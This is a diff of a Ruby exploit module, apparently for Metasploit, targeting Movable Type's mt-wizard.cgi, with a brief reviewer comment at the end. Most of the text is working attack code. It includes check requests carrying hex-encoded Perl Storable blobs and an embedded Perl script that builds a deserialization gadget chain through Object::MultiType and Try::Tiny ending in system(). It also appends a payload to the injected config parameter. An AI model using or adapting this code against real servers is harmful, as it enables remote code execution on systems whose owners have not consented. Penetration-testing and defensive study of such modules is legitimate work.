modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb

```diff
@@ -0,0 +1,326 @@
+          'config' => '53455247000000000000000304080831323334353637380408080803010000001411084461746554696d650403000000000100000078'
+        }
+      })
+    if (!res or res.code != 200 or res.body =~ /Can't locate DateTime\.pm/)
+      vprint_status("#{peer} - Failed DateTime load test");
+      return Exploit::CheckCode::Safe
+    end
+
+    vprint_status("#{peer} - Sending storable test injection for Object::MultiType presence")
+    res = send_request_cgi({
+        'method'    => 'GET',
+        'uri'       => normalize_uri(datastore['URI'], '/mt-wizard.cgi'),
+        'vars_get' => {
+          '__mode' => 'retry',
+          'step'   => 'configure',
+          'config' => '53455247000000000000000304080831323334353637380408080803010000001411114f626a6563743a3a4d756c7469547970650403000000000100000078'
+        }
+      })
+    if (!res or res.code != 200 or res.body =~ /Can't locate Object\/MultiType\.pm/)
+      vprint_status("#{peer} - Failed Object::MultiType load test");
+      return Exploit::CheckCode::Safe
+    end
+
+    return Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+    if ( datastore['DESTRUCTIVE'] == true )
+      return _exploit_destructive()
+    else
+      return _exploit_nondestructive()
+    end
+  end
+
+=begin
+
+#!/usr/bin/perl
+
+# Generate nondestructive config parameter for RCE via Object::MultiType
+# and Try::Tiny. The generated value requires minor modification to insert
+# the payload inside the system() call and resize the padding.
+
+use Storable;
+
+{
+    package Object::MultiType;
+    use overload '+' => sub { 'ingored' };
+}
+
+{
+    package Object::MultiType::Saver;
+}
+
+{
+    package DateTime;
+    use overload '+' => sub { 'ingored' };
+}
+
+{
+    package Try::Tiny::ScopeGuard;
+}
+
+my $try_tiny_loader = bless {}, 'DateTime';
+my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';
+my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType';
+my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 'Try::Tiny::ScopeGuard';
+
+my $data = [$try_tiny_loader, $try_tiny_executor];
+my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
+$frozen = unpack 'H*', $frozen;
+print "RCE payload requiring Object::MultiType and DateTime: $frozen\n";
+
+=end
+
+  def _exploit_nondestructive
+    print_status("#{peer} - Trying nondestructive attack method")
+    config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b"
+    config_payload <<  payload.raw.unpack('H*')[0]
```

Comment:
Using payload.raw is normally an stopper since you're circumventing the encoding.  ```payload.encoded``` should be used